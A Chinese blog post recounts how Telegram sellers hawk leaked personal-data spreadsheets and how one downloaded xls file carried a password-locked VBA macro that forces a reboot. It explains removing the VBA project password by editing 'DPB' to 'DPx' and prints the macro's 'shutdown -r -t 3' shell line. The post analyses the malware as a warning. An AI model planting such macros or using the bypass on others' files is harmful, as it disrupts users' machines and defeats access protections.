昨天在Telegram上看到有人在大量发布倒卖个人隐私信息的消息“ 全国选取最美校花报名信息个人资料联系方式详细xls”、“ 全国伴游网女性数据地区年龄身高电话微信QQ全有xls”，上传到百度网盘、蓝奏云传播，通过8图片网生成二维码赚取灰色收入，每个压缩包解压密码69元（支付宝收款方为 南京罗兰布艺专卖店），再附加上诱惑性诈骗PUA约炮资料“ 零成本睡女大学生，只付房费技巧分享”。

今天随手搜索到了这些文档，其中有一个是全国伴游楼凤.xls，百度网盘Download之，打开Excel文档后醒目的提示含有VBA不安全宏脚本，启用之，中毒矣！瞬间电脑上打开的程序都自动关闭了，弹窗提示1分钟之内注销电脑并重启。

VBA宏脚本分析

当打开此文档的人启用过VB宏后，再点击任意一个单元格就会执行这个注销电脑登陆并重启的shell脚本。并且此宏模块无法编辑和查看，Alt+F11快速进入宏控制台界面，提示需要输入密码，被小人加密过。

VBA宏解密

如果是高版本的Excel格式不为xls的需要保存为 xls，再使用 Notepad++打开，查找 DPB 并修改为 DPx ，再保存使用Excel打开，此时会报错，忽略即可。再按快捷键 Alt+F11 打开VBA控制台，继续报错，忽略之。此时已经可以看到相关代码模块了，点击看到有Password处，修改密码。再到菜单 工具 里进入 VBAProject属性 进入 保护 选项卡界面，设置密码并勾选查看时锁定工程。等一会儿模块代码内容就加载出来了，可以看到这家伙只是用 shell脚本写了个关机重启的命令。

VB宏脚本

'Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Sub msg()
'ExitWindowsEx ewx_reboot, 0
Shell "shutdown -r -t 3"
End Sub